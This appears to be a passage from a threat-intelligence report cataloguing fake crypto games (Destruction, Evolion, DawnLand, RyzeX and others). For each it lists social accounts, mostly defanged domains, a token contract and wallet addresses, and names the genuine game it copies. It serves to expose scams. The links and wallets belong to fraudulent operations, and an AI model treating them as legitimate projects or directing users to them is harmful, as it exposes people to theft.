0x20a31449bfee4df020c5aab738460be16fb9736f
0x6922e053269eaa66f5299f307aed6aa41bd121b5
0x5923552cddde21c80cbc587a0fda2caf97d5b345
0xc1d863ddc86ee6bfc97d40451ef2f56191b0ce59
0x399a5a8a1cc953f7f774d22274cfce0c6f4b98fd
0x560fc2ef65cbc9d6e4514ff0fd1f9ffb5dd6eeb2
0xf6bb7bc51f3f47a7dd56515af751d797d0211407
0x163e7dfd8431dd0add23387ea99dba06d67e2b13
0xaa1fb6ac2c301fb67f9b35742666f137ae668a93
0x2e6e77cc7ad0c4c7af27b9be80397c5a593addee
0x297bddb4ca9c3d0e10e675f4e167f3c8f56a2503
0x4ccb27eae8aef22fe0f2cb1ce74c209246e2ce87
0x5218843228541b80d4d606e61c3d682ae4dad8fc
0xe1276eb4d6fd628b61c4c3f96852609738474c83
0xaffe463ec9ae25b98aa93cc77318824fd2a21e3f
0xce706ad5de5cd669122d37c5166c827000aa6410
0xd75e5ad39e921b9429a9fcda2289b3b14b856577

Fake Game 2: Destruction

Twitter: https://twitter.com/DestructionWeb3 (1552873215667871744 - also known as MetaDestruction and DestructionNFTs) Linktree: https://linktr[.]ee/playdestruction Gitbook: https://destruction.gitbook[.]io/destruction/welcome-to-destruction/intoducing Hyperspace collection: https://hyperspace[.]xyz/collection/playdestruction Discord: https://discord[.]gg/playdestruction Medium: https://medium.com/@DestructionGame Domain: playdestruction[.]com h/t to Nourek for the heads up The real game is called Dissolution by Garage Studios on Steam.

Fake Game 3: Evolion

Twitter: https://twitter.com/EvolionLand (1626416120017166337 - also known as EvolionGame) Linktree: https://linktr[.]ee/evolion Gitbook: https://evolion.gitbook[.]io Discord: https://discord[.]gg/ZQN3SeHUda Medium: https://medium[.]com/@EVOLION Domains: evolionland[.]com and evoliongame[.]com h/t to Plum for the heads up The real game is called Avania (https://www.avania.io/)

Fake Game 4: Olymp Of Reptiles

Twitter: https://twitter.com/olympreptiles (1513696035914358785) Linktree: https://linktr[.]ee/olympofreptiles Gitbook: https://wp.olympreptiles[.]com/olymp-of-reptiles-whitepaper/introduction/olymp-of-reptiles Discord: https://discord[.]com/invite/olympofreptiles Domain: olympreptiles[.]com The real game is called Goldmand (https://goldmand.io/)

Fake Game 5: Brawlearth / SaintLegend

Twitter: https://twitter.com/brawlearth (2889955382) and https://twitter.com/PlaySaintLegend Linktree: https://brawlearth[.]com/linktree/ Gitbook: https://brawlearth.gitbook[.]io/brawl-earth/ and https://saint-legend.gitbook[.]io/saint-legend/ Medium: https://medium.com/@BrawlEarth and https://medium.com/@SaintLegend Domain: brawlearth[.]com / saint-legend[.]com The real game is called Tearing Spaces (https://www.tearingspaces.com/)

Fake Game 6: DawnLand / Dawn Land Metaworld

Twitter: https://twitter.com/DawnLandWorld (1617051516040249345 - also known as Meta_Dawn and DawnMetaWorld) Linktree: https://linktr[.]ee/dawnmeta Link3: https://link3[.]to/SOCYNBQI Gitbook: https://dawn-land-metaworld.gitbook[.]io/dawn-land-metaworld/info/team OpenSea collection: https://opensea.io/collection/dawn-metaworld-land Rarible collection: https://rarible.com/dawnmetaworld/items Discord: https://discord[.]gg/dawnmetaworld Medium: https://medium[.]com/@dawnlandmetaworld Coin Dawn Land (CDL) ERC20 token: 0x9B8bAE5410C40f2cF8e9A7EF32dC77ef68bB6A9F Token deployer: 0xD75e5Ad39E921B9429a9FCdA2289B3B14b856577 Domain: dawnmeta[.]io The real game is called Saleblazers by Airstrafe Interactive on Steam.

Ethereum wallet addresses related to the NFTs - OpenSea collection
0xd75e5ad39e921b9429a9fcda2289b3b14b856577
0xce706ad5de5cd669122d37c5166c827000aa6410
0xf00645510b4f8b015f2ee23ebd7615133fb4f47b
0x41d5c3aeb2433a2bfad8ac2d1bc0b0d14d903612
0x2d46925fffe5d6f46840a244b6541118615d3039
0x5384f23e4d215ac768abd726edd417a802a8d6da
0x7bd7798391e943a24b0953ce308794784647dcf5
0x4bd40e9c2abd4c55d31ab988594e753c7594b656
0x64662d6c9ba71ccc949a4dced15c2dbfd93cf580
0x6b566989443ca24548d1ce4518be4a131018fb1c
0x802c5965b780378483040951e0b95c4bb5e4d954
0xfb936670b5be4f004c0fa2470f8d19ff4587c1d1
0xa5f6a3e89239309788f0ca1ae4018f70aeed6a4d
0xd205f6689a38070d63dd4e5d87811804670085d8
0xed6fb8afd7a25e433433a755d2db66e16f238466
0x02686e0f2b8170d9e04abf99af49d064351ddb9f
0x15a45e694d5e88027f05bf69dd2ab522e6635a81
0x6c8655b9b34a4dcef93c42e4a59085187d034352
0x7b4330a3b93701c688f2c76b601a24466959269d
0x1328d0e49d9770a00ff1b3493b691c03684e7c52
0x4172b568d37a99a9d11e3d62c25453ba9c507b01
0x771a4c87c885102b476294d5bcb4cc59969ecd25
0x3e0aef6f4ea962c39126c0ff2e12494acf400b7c
0x472ac517f622cd3950f6f658fb56700bda0ca6ce
0x1affc8909f039611e6b0dd3cabbdd9516f0a4e44
0x1266fb7b0465848505e5c7fb657c66976bfd433a
0xaa68e1eea6224d8df98f106e46d59e2159268615
0x206fefe29be93fdd2533a7b3ffb64031f3c082f2
0xc92951b6a3f7a767d379ffd533748e7195ee6d08
0xcbadaccc93dbc90048fe428aedbdfd86aa0dfe4d

Fake Game 7: WildWorld

Twitter: https://twitter.com/WildmenWorld (616871862) Linktree: https://linktr[.]ee/Wildmenworld Gitbook: https://wild-world.gitbook[.]io/wild-world/ OpenSea collection: https://opensea.io/collection/crypto-wildman MagicEden collection: https://magiceden[.]io/marketplace/9aWKFk2f56Uc5x3DceYFoxcJPP7ZiHyHHPzjgqgFL6hq Discord: https://discord[.]gg/wildworld Medium: https://wildmenworld.medium[.]com Fandom: https://wildmenworld.fandom[.]com YouTube: https://www.youtube.com/@WildmenWorld Domain: wild-world[.]io The real game is called CaveWorld (https://www.caveworld.com/)

Fake Game 8: RyzeX

Twitter: https://twitter.com/RyzeX_web3 (1516416630213181441) Linktree: https://linktr[.]ee/ryzex_web3 Gitbook: https://ryzex.gitbook[.]io/ryzex[.]io/ Discord: https://discord[.]gg/ryzex-web3 Medium: https://medium[.]com/@ryzex_web3 Telegram: https://t[.]me/RyzeX_web3 OpenSea profile: https://opensea[.]io/ryzex_web3 OpenSea collection: https://opensea[.]io/collection/ryzex-web3-collection Domain: ryzex[.]io The real game is called Drunk Robots (https://drunk-robots.com/)

Fake Game 9: Guardians of the Throne

Twitter: https://twitter.com/guardiansmeta (1580771215173914624 - also known as GOTT_P2E and Play_Guardians) Linktree: https://linktr[.]ee/gott_p2e Gitbook: https://guardiansp2e.gitbook[.]io/guardians-of-the-throne/ Discord: https://discord[.]gg/pp8ty4xMS4 Domains: guardiansp2e[.]com guardiansrpg[.]com guardians-p2e[.]com and guardians-game[.]com The real game is only published on the Google Play store by ELIGHT GAME.